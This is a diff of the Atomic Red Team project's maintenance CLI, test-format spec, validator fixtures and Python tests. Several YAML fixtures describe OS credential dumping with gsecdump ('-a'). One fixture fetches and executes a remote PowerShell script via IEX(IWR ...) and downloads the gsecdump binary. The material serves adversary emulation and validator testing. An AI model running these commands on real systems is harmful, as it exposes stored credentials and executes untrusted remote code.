def model_post_init(self, __context) -> None:
for index in range(len(self.atomic_tests)):
test_number = f"{self.attack_technique}-{index + 1}"
self.atomic_tests[index].test_number = test_number
-70
View File
@@ -1,70 +0,0 @@
import re
import shlex
import subprocess
from pathlib import Path
from atomic_red_team.common import atomics_path
DEFAULT_ATOMIC_TEMPLATE = """attack_technique: TODO
display_name: TODO
atomic_tests:
- name: TODO
auto_generated_guid: TODO
description: |
TODO
supported_platforms:
- windows
input_arguments:
TODO:
description: TODO
type: string
default: TODO
executor:
command: |
TODO
name: command_prompt
"""
def create_or_append_atomic(
technique_id: str,
atomics_dir: str | Path = atomics_path,
) -> Path:
"""Creates a new technique YAML file or appends a blank atomic test."""
technique_id = technique_id.upper()
technique_path = Path(atomics_dir) / technique_id / f"{technique_id}.yaml"
technique_path.parent.mkdir(parents=True, exist_ok=True)
if technique_path.exists():
with technique_path.open("a") as file:
file.write(f"\n{template_technique_atomic_test()}")
else:
technique_path.write_text(template_technique_tests(technique_id))
return technique_path
def open_in_editor(path: Path, editor: str) -> int:
"""Opens a path in the requested editor."""
return subprocess.call([*shlex.split(editor), str(path)])
def template_technique_tests(technique_id: str | None = None) -> str:
template = DEFAULT_ATOMIC_TEMPLATE
if technique_id:
return template.replace(
"attack_technique: TODO", f"attack_technique: {technique_id.upper()}"
)
return template
def template_technique_atomic_test() -> str:
match = re.search(r"atomic_tests:\n(.*)", template_technique_tests(), re.DOTALL)
if not match:
raise ValueError(
"atomic test template does not contain an atomic_tests section"
)
return match.group(1)
-138
View File
@@ -1,138 +0,0 @@
import glob
import json
import os
import shlex
import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from typing import Annotated
import typer
from pydantic import ValidationError
from atomic_red_team.common import used_guids_file, atomics_path
from atomic_red_team.docs import AtomicRedTeamDocs
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.new_atomic import create_or_append_atomic, open_in_editor
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@app.command()
def generate_docs():
"""Generates markdown docs, indexes, and ATT&CK Navigator layers."""
_oks, fails = AtomicRedTeamDocs().generate_all_the_docs()
if fails:
sys.exit(len(fails))
@app.command()
def new_atomic(
technique_identifier: Annotated[
str, typer.Argument(help="Technique identifier, such as T1234")
],
edit: Annotated[bool, typer.Option("--edit/--no-edit")] = True,
):
"""Creates a new atomic YAML file or appends a blank test to an existing file."""
output_path = create_or_append_atomic(technique_identifier)
if edit:
editor = os.environ.get("EDITOR", "vi")
if len(shlex.split(editor)) == 0:
raise typer.BadParameter("EDITOR must not be empty")
sys.exit(open_in_editor(output_path, editor))
@app.command()
def generate_guids():
"""Generates missing GUIDs for the atomic files"""
with open(used_guids_file, "r") as file:
used_guids = file.readlines()
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
generate_guids_for_yaml(file, partial(get_unique_guid, guids=used_guids))
@app.command()
def generate_schemas():
"""Generates JSON and YAML schemas for techniques"""
schema = Technique.model_json_schema() # (1)!
with open("schema.yaml", "w") as f:
yaml.default_flow_style = False
yaml.dump(schema, f)
with open("schema.json", "w") as f:
f.write(json.dumps(schema, indent=2))
@app.command()
def generate_counter():
"""Generate atomic tests count svg"""
test_count = 0
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
with open(file, "r") as f:
yaml_data = yaml.load(f)
if yaml_data is not None and "atomic_tests" in yaml_data:
test_count += len(yaml_data["atomic_tests"])
# Generate the shields.io badge URL
params = {"label": "Atomics", "message": str(test_count), "style": "flat"}
url = "https://img.shields.io/badge/{}-{}-{}.svg".format(
urllib.parse.quote_plus(params["label"]),
urllib.parse.quote_plus(params["message"]),
urllib.parse.quote_plus(params["style"]),
)
# Save shields URL in GitHub Output to be used in the next step.
with open(os.environ["GITHUB_OUTPUT"], "a") as fh:
print(f"result={url}", file=fh)
@app.command()
def generate_labels(
pull_request: Annotated[str, typer.Option("--pr")],
token: Annotated[str, typer.Option("--token")],
):
"""Generate labels for a pull request."""
api = GithubAPI(token)
api.save_labels_and_maintainers(pull_request)
@app.command()
def validate():
"""
Validate all the atomic techniques in a directory.
"""
validator = Validator()
errors = defaultdict(list)
for folder in glob.glob(f"{atomics_path}/T*"):
for item in os.scandir(folder):
try:
validator.validate(item)
except ValidationError as error:
errors[item.path].append(error)
if len(errors) == 0:
print("Validation successful")
else:
print("Validation failed")
for i, errors in errors.items():
print(f"Error occurred with {i.replace(f'{atomics_path}/', '')}.")
print("Each of the following are why it failed:")
for error in errors:
if isinstance(error, ValidationError):
for k, v in format_validation_error(error).items():
print(f"\n\tInvalid {'.'.join(map(str, v))}: {k}\n")
else:
print(f"\n\t{error}\n")
sys.exit(1)
if __name__ == "__main__":
app()
+164
View File
@@ -0,0 +1,164 @@
#
# This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
#
# The directory structure is:
# - These tests reside in the `atomics` directory
# - One directory per ATT&CK technique, named "T1234"
# - All the atomic tests for a technique in a file called "T1234.yaml" inside that directory
# - Any payloads, supporting materials, etc for the atomic tests also live in that directory
#
# For example:
#
# atomic_red_team/
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
display_name: Name of the technique as defined by ATT&CK. # Example: 'Audio Capture'
# `atomic_tests` is an array of distinct test cases inside this technique. A test case should
# include ALL of the information needed to run that test (ie, this is the "atomic" - you don't
# distribute steps across different atomics)
# Each of these tests is a YAML array element (starts with a `-`).
atomic_tests:
#
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
- one list
- two list
- red list
- [blue list](https://google.com)
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
supported_platforms:
- windows
# inputs to the atomic test that are required to run the test (think of these like function arguments).
# This is a hash where the key is the input name, value is a hash defining the input argument.
input_arguments:
# this is the first input argument, called "output_file"
output_file:
# Short description of the input argument
description: xxxxx
# data type of the input. Possible values could include:
# - Path (a file path)
# - Url (a URL)
# - String
# - Integer
# - Float
# - really anything else you'd like, but add it to this list
type: Path
# default value for this argument that will be used if one is not specifid
default: test.wma
# this is a example of a second argument
malware_payload_url:
description: xxxxx
type: Url
default: 0000:00:30
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
#
# 2. Click 'Load unpacked extension...' and navigate to
# [Browser_Extension](../T1176/)
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executors:
- name: bash
command: echo "Hello world!"
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Root login
auto_generated_guid:
description: |
Login as root.
supported_platforms:
- linux
executor:
command: |
sudo -i
name: bash
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name:
@@ -1,15 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
@@ -1,14 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
random_field: abc123
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: float
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: integer
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name: "bash"
@@ -1,39 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,34 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,13 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,27 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: url
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
View File
-77
View File
@@ -1,77 +0,0 @@
import json
from atomic_red_team.attack_api import Attack
def test_techniques_by_tactic_filters_platform_revoked_and_deprecated(tmp_path):
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Allowed Technique",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
{
"type": "attack-pattern",
"id": "attack-pattern--22222222-2222-4222-8222-222222222222",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Wrong Platform",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1002"}
],
"x_mitre_platforms": ["Linux"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
{
"type": "attack-pattern",
"id": "attack-pattern--33333333-3333-4333-8333-333333333333",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Revoked Technique",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1003"}
],
"x_mitre_platforms": ["Windows"],
"revoked": True,
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
],
}
)
)
attack = Attack(attack_file)
assert attack.technique_info("t1001")["name"] == "Allowed Technique"
assert attack.techniques_by_tactic("windows")["execution"] == [
attack.technique_info("T1001")
]
-473
View File
@@ -1,473 +0,0 @@
import json
import yaml
from mitreattack import navlayers
from atomic_red_team.docs import AtomicRedTeam, AtomicRedTeamDocs
def test_generate_technique_docs_writes_markdown(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "11111111-1111-4111-8111-111111111111",
"input_arguments": {
"path": {
"description": "File path",
"type": "path",
"default": "C:\\Temp\\file.txt",
}
},
"executor": {
"name": "command_prompt",
"command": "type #{path}",
"cleanup_command": "del #{path}",
},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = technique_dir / "T1001.md"
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
docs = AtomicRedTeamDocs(attack_file=attack_file, atomic_red_team=atomic_red_team)
docs.generate_technique_docs(
atomic_red_team.atomic_tests[0],
output_path,
)
output = output_path.read_text()
assert "# T1001 - Data Obfuscation" in output
assert "[Atomic Test #1: Run command](#atomic-test-1-run-command)" in output
assert "| path | File path | path | C:&#92;Temp&#92;file.txt|" in output
assert "```cmd\ntype #{path}\n```" in output
assert "```cmd\ndel #{path}\n```" in output
def test_generate_technique_docs_separates_markdown_blocks(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "First command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "11111111-1111-4111-8111-111111111111",
"input_arguments": {
"path": {
"description": "File path",
"type": "path",
"default": "C:\\Temp",
}
},
"executor": {
"name": "command_prompt",
"command": "type #{path}",
"cleanup_command": "del #{path}",
},
"dependencies": [
{
"description": "Target must exist",
"prereq_command": "if exist #{path} (exit /b 0)",
"get_prereq_command": "mkdir #{path}",
}
],
},
{
"name": "Second command",
"description": "Runs another command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "22222222-2222-4222-8222-222222222222",
"executor": {"name": "command_prompt", "command": "dir"},
},
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = technique_dir / "T1001.md"
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
docs = AtomicRedTeamDocs(attack_file=attack_file, atomic_red_team=atomic_red_team)
docs.generate_technique_docs(atomic_red_team.atomic_tests[0], output_path)
output = output_path.read_text()
assert (
output
== """# T1001 - Data Obfuscation
## Description from ATT&CK
> Technique description.
[Source](https://attack.mitre.org/techniques/T1001)
## Atomic Tests
- [Atomic Test #1: First command](#atomic-test-1-first-command)
- [Atomic Test #2: Second command](#atomic-test-2-second-command)
### Atomic Test #1: First command
Runs a command.
**Supported Platforms:** Windows
**auto_generated_guid:** `11111111-1111-4111-8111-111111111111`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | File path | path | C:&#92;Temp|
#### Attack Commands: Run with `command_prompt`!
```cmd
type #{path}
```
#### Cleanup Commands
```cmd
del #{path}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must exist
###### Check Prereq Commands
```cmd
if exist #{path} (exit /b 0)
```
###### Get Prereq Commands
```cmd
mkdir #{path}
```
### Atomic Test #2: Second command
Runs another command.
**Supported Platforms:** Windows
**auto_generated_guid:** `22222222-2222-4222-8222-222222222222`
#### Attack Commands: Run with `command_prompt`!
```cmd
dir
```
"""
)
def test_github_link_prompts_for_contribution_when_platform_missing(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
technique = {
"name": "Data Obfuscation",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
}
link = atomic_red_team.github_link_to_technique(
technique,
include_identifier=True,
only_platform="linux",
)
assert link == (
"T1001 Data Obfuscation "
"[CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
)
def test_generate_navigator_layers_writes_mitreattack_layer(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Windows command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
},
{
"name": "Linux command",
"description": "Runs a command.",
"supported_platforms": ["linux"],
"executor": {"name": "sh", "command": "ls"},
},
],
}
)
)
output_dir = tmp_path / "layers"
output_dir.mkdir()
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=tmp_path / "enterprise-attack.json",
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
docs.generate_navigator_layers(output_dir)
layer = navlayers.Layer()
layer.from_file(str(output_dir / "art-navigator-layer-windows.json"))
technique = layer.layer.techniques[0]
assert layer.layer.name == "Atomic Red Team (Windows)"
assert layer.layer.versions.attack == "19"
assert layer.layer.filters.platforms == ["Windows"]
assert technique.techniqueID == "T1001"
assert technique.score == 1
assert technique.comment == "\n- Windows command\n"
def test_generate_all_the_docs_prints_generated_file_paths(
tmp_path, capsys, monkeypatch
):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
indexes_dir = atomics_dir / "Indexes"
for path in [
indexes_dir / "Matrices",
indexes_dir / "Indexes-Markdown",
indexes_dir / "Indexes-CSV",
indexes_dir / "Attack-Navigator-Layers",
]:
path.mkdir(parents=True)
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=attack_file,
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
monkeypatch.setattr(docs, "generate_indexes", lambda: None)
docs.generate_all_the_docs()
output = capsys.readouterr().out
expected_markdown_path = technique_dir / "T1001.md"
assert f"Generating docs for {atomic_yaml_path}" in output
assert f"=> {expected_markdown_path} => OK" in output
assert f"Generated docs for 1 techniques, 0 failures" in output
def test_generate_yaml_index_serializes_mitreattack_stix_dates(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = tmp_path / "index.yaml"
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=attack_file,
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
docs.generate_yaml_index(output_path)
output = yaml.safe_load(output_path.read_text())
assert output["command-and-control"]["T1001"]["technique"]["created"] == (
"2024-01-01T00:00:00.000Z"
)
-125
View File
@@ -1,125 +0,0 @@
from hypothesis import given, strategies as st, settings, HealthCheck
from hypothesis.provisional import urls
from pydantic import AnyUrl
from pydantic.networks import IPvAnyAddress
from atomic_red_team.models import (
Technique,
Atomic,
StringArg,
IntArg,
FloatArg,
UrlArg,
ManualExecutor,
Platform,
CommandExecutor,
ExecutorType,
)
executor_strategy = st.sampled_from(["powershell", "bash", "sh", "command_prompt"])
st.register_type_strategy(IPvAnyAddress, st.ip_addresses())
st.register_type_strategy(AnyUrl, urls())
alphanumeric_underscore_strategy = st.text(
alphabet=st.sampled_from(
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
),
min_size=4,
)
input_args_types = [
st.builds(
StringArg,
description=st.text(),
default=st.text(),
type=st.sampled_from(["string", "path", "String", "Path"]),
),
st.builds(
IntArg,
description=st.text(),
default=st.integers(),
type=st.sampled_from(["integer", "Integer"]),
),
st.builds(
FloatArg,
description=st.text(),
default=st.floats(),
type=st.sampled_from(["float", "Float"]),
),
st.builds(
UrlArg,
description=st.text(),
default=st.one_of(urls(), st.ip_addresses()),
type=st.sampled_from(["url", "Url"]),
),
]
platforms_strategy = st.lists(st.sampled_from(list(Platform.__args__)), min_size=1)
input_arguments_strategy = st.dictionaries(
